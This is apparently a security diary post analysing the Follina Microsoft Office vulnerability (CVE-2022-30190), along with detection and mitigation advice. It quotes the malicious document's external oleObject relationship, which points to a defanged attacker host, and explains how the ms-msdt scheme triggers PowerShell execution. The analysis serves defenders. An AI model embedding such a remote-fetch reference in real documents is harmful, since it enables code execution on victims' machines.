Last Updated: 2022-06-01 06:06:34 UTC
by Xavier Mertens (Version: 1)
Update: We now have an official blog post from Microsoft:
Guidance for CVE-2022-30190 Microsoft Support Diagnostic Tool Vulnerability.
The workaround to disable the MSDT URL Protocol is now confirmed, and we do have a CVE number for the issue.
In case you are asked to brief management: We do have some PowerPoint slides to get you started.
PPT: https://i5c.us/msdtppt. PDF: https://i5c.us/msdtpdf [These documents will be updated as we learn more. Please provide feedback if you find errors or have suggestions]
Most recent update: May 30th 10:30pm EDT (May 31st 02:30 UTC) reflecting Microsoft's guidance.
It was a long weekend for many European countries, and it's an off-day in the US, but we were aware of a new attack vector for Microsoft Office documents. It started with a tweet from @nao_sec, who reported an interesting Word document. Office documents have been a common way to drop malware into victims’ computers for a while. We have to fight against VBA macros, XLS 4 macros, embedded payload, etc. But the one described here is interesting.
The file is detected by only 17 antivirus engines on VT (sha256:4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784)
When you open the file, nothing is displayed (it seems like a blank document), but, looking at the document specs, you see something interesting: The document contains an external reference pointing to a malicious URL:
<Relationship Id="rId996" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="hxxps://www[.]xmlformats[.]com/office/word/2022/wordprocessingDrawing/RDF842l.html!" TargetMode="External"/>
This host, www[.]xmlformats[.]com, will be visited when you open the document (and activate the content). The following payload will be fetched:
The interesting part is the windows.location.href. The protocol schema is “ms-msdt:/“ (note the single slash!). What’s this MSDT or “Microsoft Support Diagnostic Tool”? msdt.exe is a tool provided by Microsoft that will collect information to send to Microsoft Support.
Microsoft Office will automatically process the MSDT URL and execute the Powershell payload. The Base64 contains this:
Even if macros are disabled, the protected view feature does its job. However, Kevin Beaumont tested a document converted into an RTF form. It works even when you preview the document in Windows explorer. This vulnerability does not work with all Office versions (at least in Office 2013 and 2016).
While we had a look at the malicious file during the weekend, Didier generated a new payload that will fire a classic calculator as a demonstration of the code execution. He recorded a video of the behavior .
This behavior is really bad. How to detect this? Note that the suspicious scheme ("ms-msdt:/") is not present in the document. It's present in the first stage payload that will be downloaded by Office. Here are some ideas:
1. Check the parent-child relationship: A good idea is to track msdt.exe processes launched from parent processes like word.exe or excel.exe.
2. Delete the 'ms-msdt' scheme from the registry. Didier performed some tests, and it works.
3. Prevent Office from spawning child processes by creating an ASL rule:
Set-MpPreference -AttackSurfaceReductionRules_Ids d4f940ab-401b-4efc-aadc-ad5f3c50688a -AttackSurfaceReductionRules_Actions Enabled
4. Of course, train your users not to open suspicious documents.
We will continue to keep an eye on this new attack vector and update this diary. Feel free to share your findings with us.
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant